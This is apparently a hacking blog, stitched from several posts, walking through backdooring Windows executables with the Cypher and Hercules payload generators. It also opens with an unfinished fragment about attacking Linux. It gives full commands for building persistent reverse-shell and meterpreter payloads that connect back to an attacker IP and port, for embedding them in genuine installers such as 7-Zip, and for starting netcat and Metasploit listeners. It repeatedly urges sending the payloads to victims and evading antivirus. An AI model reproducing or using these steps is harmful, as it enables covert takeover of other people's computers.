Hello aspiring hackers, till now we have only seen hacking windows operating systems with customized payload generators. Today we will see hacking Linux OS with Arcanus framework.
Although not as great as Windows, people using Linux OS are growing day by day. In my opinion, Linux OS is a bit easy to hack with payload generators as there is a general myth that Linux is immune to malware. Some of my friends use Linux as dual boot to keep themselves safe from virus.
Good morning aspiring hackers. Today we will see Windows hacking with Cypher. Cypher is a simple tool to automatically add shellcode to PE files. PE files means portable executable files.
But what is shellcode? It is a list of carefully crafted instructions that can be executed once the code is injected into a running application. So in simple terms, Cypher allows us to add shellcode to portable executable files like…. well it can be any Windows executable. Usually we use shellcode to get a remote shell or create a backdoor shell on our target system. Cypher even allows us to get the powerful meterpreter shell.
Now let us see how to perform Windows hacking with this tool. First, let us git clone this tool into Kali Linux using commands as shown below.
Make sure you are in the same directory where cypher is cloned. It gives information on how to create different types of payloads. Let us add a reverse meterpreter shell using the command shown below.
Now let us see all the options we specified.
addShell.py : syntax of Cypher
-f : the ‘f’ option stands for file. This is to specify the portable executable into which we want to create our backdoor. Remember that some executables are packed and don’t allow writing shell code. Test and use accordingly. Here, I’m using plink.exe located on my Desktop.
-t : the target OS for which you want to create this backdoor for. These include four options: 0,1,2,3. These are for Windows 7 32bit, Windows 7 64 bit, Windows 8.1 64bit and Windows 10 64bit respectively. Here I have specified it as 1 since I’m testing it on Windows 7 64bit OS.
-d : offset. This is nothing but distance between the point where we are trying to enter our shellcode to the point where we are exactly placing our shellcode. Even if you don’t understand that sentence above, let me tell you why it’s important. The success of injecting our shellcode into an executable is that the executable should work fine even after we inject our backdoor. The exe shouldn’t crash. By default, this value is set to four. But if your exe is crashing, set it to a greater value( I set it to 10) as I did above.
-H : attacker’s IP address. In our case, IP address of Kali Linux.
-P : the port on which we want our shell back.
-p : Mind the lowercase. This stands for payload we want to set. ‘1’ stands for Windows/meterpreter/reverse_http. The other options are,
After setting all the options, hit on Enter. The payload will be created with the same name but end with _evil as shown below. I leave sending the package to our intended victim to you but remember almost every antivirus can detect our file as malicious.
Since my blog is committed to make hacking as close to reality as possible, I have a solution. Google for “making Finfisher undetectable”. Open the first link Google search finds and follow some of the steps shown there. Trust me this works. Now send the package to the victim.
Now to listen to our reverse shell, we need a listener. Open Metasploit and create a reverse_http listener as shown below.
Set the required options like IP address and port. Note that they should be same as we specified while we added shell code to the file. Type run command. The exploit should hang on as shown below.
Now when our victim clicks on the file we sent, we should get a meterpreter reverse shell as shown below.
Hello Aspiring Ethical Hackers. Today we will learn about a payload generator that I used in hacking Windows 10 (actually of its antivirus ). Since remote exploits ceased to exist in Windows operating systems after Windows XP, it can only be done by sending payloads in portable executables. The biggest challenge in sending these malicious portable executables is bypassing its security mechanisms. Enter Hercules.
Hercules is a special payload generator that can bypass all antivirus software. It has features like persistence and keylogger which make it too cool. Named after a Greek Hero, Hercules stands up for its name. In our testing, none of the antivirus was able to detect payload generated by Hercules. Now let us see how Hercules can be used to hack Windows 10 . In Kali Linux, open a terminal and type command git clone https://github.com/EgeBalci/Hercules to clone Hercules into Kali Linux.
The tool is cloned into directory called Hercules. Navigate into that directory and view the contents of the directory as shown below. There is a directory called SOURCE. Move into that directory. There should be a file called HERCULES.go.
Now type command go build HERCULES.go to build this file. Remember Linux is very strict, so be careful with uppercase and lowercase. Once you run that command, we will get another file with the same name but without any extension as shown below.
Now its time to create our payload. Type command,
./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic
Let me explain this command.
192.168.25.146 – IP address of our attacker system ( in our case Kali Linux )
4444 – the port number over which we want our victim system to connect to us.
-p – payload ( in this case, windows/meterpreter/reverse_tcp )
-a – architecture of the payload ( 64 bits or 32 bits )
-l – linking ( static or dynamic, dynamic linking reduces the payload size )
Hit on Enter. Our payload is created in the same directory.
Our payload’s name is payload.exe. Type “ls” as shown below. Now send this file to our victim using your creativity.
On our Kali Linux, type command nc -l -p 4444. We are opening a netcat session on port 4444 ( the same port we set up above). Now when the user clicks on our payload, we will get the remote system’s shell as shown below.
Type command help to see all the commands we can execute on our target system.
For example, type command systeminfo to see all the system settings of our target. This was pretty simple. But this is a one time session, which means once you get out of this session you are disconnected from your victim.
So let’s add a little bit reality to our payload this time. Now we will add two things : persistence and embedding.
–persistence – Once our payload is executed by the victim, it will continually try to connect to our attacker system. So we can end the session and start it once again. The only condition is our victim’s system should be on and of course we should be listening.
–embed – we will add a genuine executable into our payload. Type command
./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic –persistence –embed=/root/Desktop/7z1602.exe
Here we are embedding 7zip into our payload. Remember we need to send the payload created in SOURCE directory to our victim.
So when victim clicks on our payload to install it, UAC will prompt this window( the user should get a whiff here, if he is aware ).
When the user clicks on “yes”, the installation will progress normally on the victim’s system.
And on our attacker system, we should have already got the victim’s shell as shown below. As I already told, this is a persistent connection. Disconnect the session by typing ‘CTRL+C” and connect again with nc -l -p 4444 to get the session back. Hope that was helpful. If you have any queries or doubts, please feel free to leave your comments.
That was all about hacking Windows 10 with Hercules Payload Generator.